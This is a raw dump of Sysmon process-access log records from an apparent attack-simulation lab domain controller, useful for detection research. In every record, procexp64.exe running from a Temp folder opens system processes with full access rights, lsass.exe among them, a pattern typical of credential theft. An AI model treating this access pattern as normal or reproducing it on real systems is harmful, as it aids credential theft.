15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786010Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786009Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786008Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786007Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786006Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786005Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:59.455{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786234Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786233Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:00.486{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000786232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 